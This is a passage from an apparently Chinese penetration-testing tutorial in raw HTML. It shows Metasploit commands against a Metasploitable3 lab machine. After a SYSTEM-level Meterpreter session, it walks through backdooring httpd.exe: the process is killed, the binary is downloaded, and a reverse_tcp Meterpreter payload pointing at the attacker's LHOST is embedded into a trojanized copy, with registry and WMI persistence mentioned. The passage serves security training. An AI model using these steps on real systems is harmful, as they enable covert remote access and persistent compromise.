class=\"hljs-string\">(192.168.177.143:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:62432)<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">2019-04-28 09:37:48<\/span> <span class=\"hljs-string\">+0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">getuid<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Server username:<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\SYSTEM<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Computer :<\/span> <span class=\"hljs-string\">METASPLOITABLE3<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">OS :<\/span> <span class=\"hljs-string\">Windows<\/span> <span class=\"hljs-number\">2008 <\/span><span class=\"hljs-string\">R2<\/span> <span class=\"hljs-string\">(Build<\/span> <span class=\"hljs-number\">7601<\/span><span class=\"hljs-string\">,<\/span> <span class=\"hljs-string\">Service<\/span> <span class=\"hljs-string\">Pack<\/span> <span class=\"hljs-number\">1<\/span><span class=\"hljs-string\">).<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Architecture :<\/span> <span class=\"hljs-string\">x64<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">System Language :<\/span> <span class=\"hljs-string\">en_US<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Domain :<\/span> <span class=\"hljs-string\">WORKGROUP<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Logged On Users :<\/span> <span class=\"hljs-number\">2<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"29\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Meterpreter :<\/span> <span class=\"hljs-string\">x86\/windows<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"30\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"31\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<h4 class=\"heading\">8\u3001\u5b89\u88c5\u540e\u95e8<\/h4>\n<p>\u83b7\u53d6<code>shell<\/code>\u540e\uff0c\u6211\u4eec\u5982\u679c\u9700\u8981\u786e\u4fdd\u80fd\u6301\u4e45\u6027\u7684\u8bbf\u95ee\u76ee\u6807\u7cfb\u7edf\uff0c\u6211\u4eec\u9700\u8981\u5b89\u88c5\u540e\u95e8\u3002<\/p>\n<h5 class=\"heading\">\u51c6\u5907\u5de5\u4f5c<\/h5>\n<p>\u901a\u8fc7\u4e4b\u524d\u7684\u6f0f\u6d1e\u5229\u7528\uff0c\u6211\u4eec\u5df2\u7ecf\u83b7\u5f97\u4e86\u4e0e\u76ee\u6807\u673a\u7684<code>session<\/code>\uff0c\u6211\u4eec\u5c06\u5229\u7528<code>meterpreter session<\/code>\u6765\u5b89\u88c5\u540e\u95e8\u670d\u52a1\u3002\u8fd9\u91cc\u4ee5<code>httpd.exe<\/code>\u4e3a\u4f8b\u3002<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">ps<\/span> <span class=\"hljs-string\">-S<\/span> <span class=\"hljs-string\">httpd.exe<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Filtering<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-string\">'httpd.exe'<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Process<\/span> <span class=\"hljs-string\">List<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">============<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">PID<\/span> <span class=\"hljs-string\">PPID<\/span> <span class=\"hljs-string\">Name<\/span> <span class=\"hljs-string\">Arch<\/span> <span class=\"hljs-string\">Session<\/span> <span class=\"hljs-string\">User<\/span> <span class=\"hljs-string\">Path<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">---<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-------<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">----<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">1304 <\/span><span class=\"hljs-number\">1816 <\/span><span class=\"hljs-string\">dcserverhttpd.exe<\/span> <span class=\"hljs-string\">x86<\/span> <span class=\"hljs-number\">0<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\LOCAL<\/span> <span class=\"hljs-string\">SERVICE<\/span> <span class=\"hljs-string\">C:\\ManageEngine\\DesktopCentral_Server\\apache\\bin\\dcserverhttpd.exe<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">1816 <\/span><span class=\"hljs-number\">472<\/span> <span class=\"hljs-string\">dcserverhttpd.exe<\/span> <span class=\"hljs-string\">x86<\/span> <span class=\"hljs-number\">0<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\LOCAL<\/span> <span class=\"hljs-string\">SERVICE<\/span> <span class=\"hljs-string\">C:\\ManageEngine\\DesktopCentral_Server\\apache\\bin\\dcserverhttpd.exe<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">3180 <\/span><span class=\"hljs-number\">472<\/span> <span class=\"hljs-string\">httpd.exe<\/span> <span class=\"hljs-string\">x64<\/span> <span class=\"hljs-number\">0<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\LOCAL<\/span> <span class=\"hljs-string\">SERVICE<\/span> <span class=\"hljs-string\">C:\\wamp\\bin\\apache\\Apache2.2.21\\bin\\httpd.exe<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">3880 <\/span><span class=\"hljs-number\">3180 <\/span><span class=\"hljs-string\">httpd.exe<\/span> <span class=\"hljs-string\">x64<\/span> <span class=\"hljs-number\">0<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\LOCAL<\/span> <span class=\"hljs-string\">SERVICE<\/span> <span class=\"hljs-string\">C:\\wamp\\bin\\apache\\Apache2.2.21\\bin\\httpd.exe<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>\u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u5c06\u5229\u7528<code>windows<\/code>\u6ce8\u518c\u8868\u6301\u4e45\u6027\u6a21\u5757\u5b89\u88c5\u968f\u7cfb\u7edf\u542f\u52a8\u7684\u540e\u95e8\u3002<\/p>\n<p>\u6700\u540e\u6211\u4eec\u5c06\u5229\u7528<code>WMI<\/code>( Windows Management Instrumentation )\u521b\u5efa\u4e00\u4e2a\u65e0\u6587\u4ef6\u540e\u95e8\u3002<\/p>\n<h5 class=\"heading\">\u600e\u4e48\u505a<\/h5>\n<p>1\u3001\u4e0d\u80fd\u5728\u7a0b\u5e8f\u8fd0\u884c\u7684\u65f6\u5019\u5b89\u88c5\u540e\u95e8\uff0c\u6240\u4ee5\u5148\u6740\u6b7b\u8fdb\u7a0b<\/p>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">meterpreter<\/span> <span class=\"hljs-string\">&gt; kill 3880<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Killing<\/span>: <span class=\"hljs-string\">3880<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-attr\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<p>2\u3001\u5c06\u9700\u8981\u66ff\u6362\u6210\u540e\u95e8\u7684\u7a0b\u5e8f\u4e0b\u8f7d\u4e0b\u6765<\/p>\n<pre><code class=\"hljs linux copyable css\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-selector-tag\">meterpreter<\/span> &gt; <span class=\"hljs-selector-tag\">download<\/span> <span class=\"hljs-selector-tag\">C<\/span>:\\\\<span class=\"hljs-selector-tag\">wamp<\/span>\\\\<span class=\"hljs-selector-tag\">bin<\/span>\\\\<span class=\"hljs-selector-tag\">apache<\/span>\\\\<span class=\"hljs-selector-tag\">apache2<\/span><span class=\"hljs-selector-class\">.2<\/span><span class=\"hljs-selector-class\">.21<\/span>\\\\<span class=\"hljs-selector-tag\">bin<\/span>\\\\<span class=\"hljs-selector-tag\">httpd<\/span><span class=\"hljs-selector-class\">.exe<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-selector-attr\">[*]<\/span> <span class=\"hljs-selector-tag\">Downloading<\/span>: <span class=\"hljs-selector-tag\">C<\/span>:\\<span class=\"hljs-selector-tag\">wamp<\/span>\\<span class=\"hljs-selector-tag\">bin<\/span>\\<span class=\"hljs-selector-tag\">apache<\/span>\\<span class=\"hljs-selector-tag\">apache2<\/span><span class=\"hljs-selector-class\">.2<\/span><span class=\"hljs-selector-class\">.21<\/span>\\<span class=\"hljs-selector-tag\">bin<\/span>\\<span class=\"hljs-selector-tag\">httpd<\/span><span class=\"hljs-selector-class\">.exe<\/span> <span class=\"hljs-selector-tag\">-<\/span>&gt; <span class=\"hljs-selector-tag\">httpd<\/span><span class=\"hljs-selector-class\">.exe<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-selector-attr\">[*]<\/span> <span class=\"hljs-selector-tag\">Downloaded<\/span> 21<span class=\"hljs-selector-class\">.00<\/span> <span class=\"hljs-selector-tag\">KiB<\/span> <span class=\"hljs-selector-tag\">of<\/span> 21<span class=\"hljs-selector-class\">.00<\/span> <span class=\"hljs-selector-tag\">KiB<\/span> (100<span class=\"hljs-selector-class\">.0<\/span>%): <span class=\"hljs-selector-tag\">C<\/span>:\\<span class=\"hljs-selector-tag\">wamp<\/span>\\<span class=\"hljs-selector-tag\">bin<\/span>\\<span class=\"hljs-selector-tag\">apache<\/span>\\<span class=\"hljs-selector-tag\">apache2<\/span><span class=\"hljs-selector-class\">.2<\/span><span class=\"hljs-selector-class\">.21<\/span>\\<span class=\"hljs-selector-tag\">bin<\/span>\\<span class=\"hljs-selector-tag\">httpd<\/span><span class=\"hljs-selector-class\">.exe<\/span> <span class=\"hljs-selector-tag\">-<\/span>&gt; <span class=\"hljs-selector-tag\">httpd<\/span><span class=\"hljs-selector-class\">.exe<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-selector-attr\">[*]<\/span> <span class=\"hljs-selector-tag\">download<\/span> : <span class=\"hljs-selector-tag\">C<\/span>:\\<span class=\"hljs-selector-tag\">wamp<\/span>\\<span class=\"hljs-selector-tag\">bin<\/span>\\<span class=\"hljs-selector-tag\">apache<\/span>\\<span class=\"hljs-selector-tag\">apache2<\/span><span class=\"hljs-selector-class\">.2<\/span><span class=\"hljs-selector-class\">.21<\/span>\\<span class=\"hljs-selector-tag\">bin<\/span>\\<span class=\"hljs-selector-tag\">httpd<\/span><span class=\"hljs-selector-class\">.exe<\/span> <span class=\"hljs-selector-tag\">-<\/span>&gt; <span class=\"hljs-selector-tag\">httpd<\/span><span class=\"hljs-selector-class\">.exe<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-selector-tag\">meterpreter<\/span> &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable css\"><\/code><\/pre>\n<p>3\u3001\u5c06\u4f1a\u8bdd\u9000\u56de\u5230\u540e\u53f0\uff0c\u4f7f\u7528<code>reverse_tcp<\/code>\u653b\u51fb\u8f7d\u8377\uff0c\u4f7f\u7528<code>generate<\/code>\u751f\u6210\u540e\u95e8\u6587\u4ef6\u3002<\/p>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(windows<span class=\"hljs-regexp\">\/smb\/<\/span>ms17_010_psexec) &gt; use payload<span class=\"hljs-regexp\">\/windows\/<\/span>x64<span class=\"hljs-regexp\">\/meterpreter\/<\/span>reverse_tcp<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 payload(windows<span class=\"hljs-regexp\">\/x64\/<\/span>meterpreter\/reverse_tcp) &gt; set LHOST <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">LHOST =&gt; <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 payload(windows<span class=\"hljs-regexp\">\/x64\/<\/span>meterpreter<span class=\"hljs-regexp\">\/reverse_tcp) &gt; generate -p Windows -x \/<\/span>root<span class=\"hljs-regexp\">\/httpd.exe -k -f exe -o \/<\/span>root\/httpd-backdoored.exe<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Writing <span class=\"hljs-number\">29184<\/span> bytes to <span class=\"hljs-regexp\">\/root\/<\/span>httpd-backdoored.exe...<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 payload(windows<span class=\"hljs-regexp\">\/x64\/<\/span>meterpreter\/reverse_tcp) &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<p>\u5173\u4e8e<code>generate<\/code>\u7684\u53c2\u6570\u8bf4\u660e\uff0c\u53ef\u4ee5\u67e5\u770b\u5e2e\u52a9\u4fe1\u606f<\/p>\n<pre><code class=\"hljs linux copyable delphi\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 payload(windows\/x64\/meterpreter\/reverse_tcp) &gt; generate -h<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Usage: generate [options]<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Generates a payload.<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">OPTIONS:<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-E Force encoding<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-O &lt;opt&gt; <span class=\"hljs-keyword\">Deprecated<\/span>: <span class=\"hljs-keyword\">alias<\/span> <span class=\"hljs-keyword\">for<\/span> the <span class=\"hljs-string\">'-o'<\/span> option<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-P &lt;opt&gt; Total desired payload size, auto-produce approproate NOPsled length<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-S &lt;opt&gt; The new section <span class=\"hljs-keyword\">name<\/span> <span class=\"hljs-keyword\">to<\/span> use when generating (large) Windows binaries<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-b &lt;opt&gt; The list <span class=\"hljs-keyword\">of<\/span> characters <span class=\"hljs-keyword\">to<\/span> avoid example: <span class=\"hljs-string\">'\\x00\\xff'<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-e &lt;opt&gt; The encoder <span class=\"hljs-keyword\">to<\/span> use<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-f &lt;opt&gt; Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-h Show this <span class=\"hljs-keyword\">message<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-i &lt;opt&gt; The number <span class=\"hljs-keyword\">of<\/span> times <span class=\"hljs-keyword\">to<\/span> encode the payload<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-k Preserve the template behavior <span class=\"hljs-keyword\">and<\/span> inject the payload <span class=\"hljs-keyword\">as<\/span> a new thread<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-n &lt;opt&gt; Prepend a nopsled <span 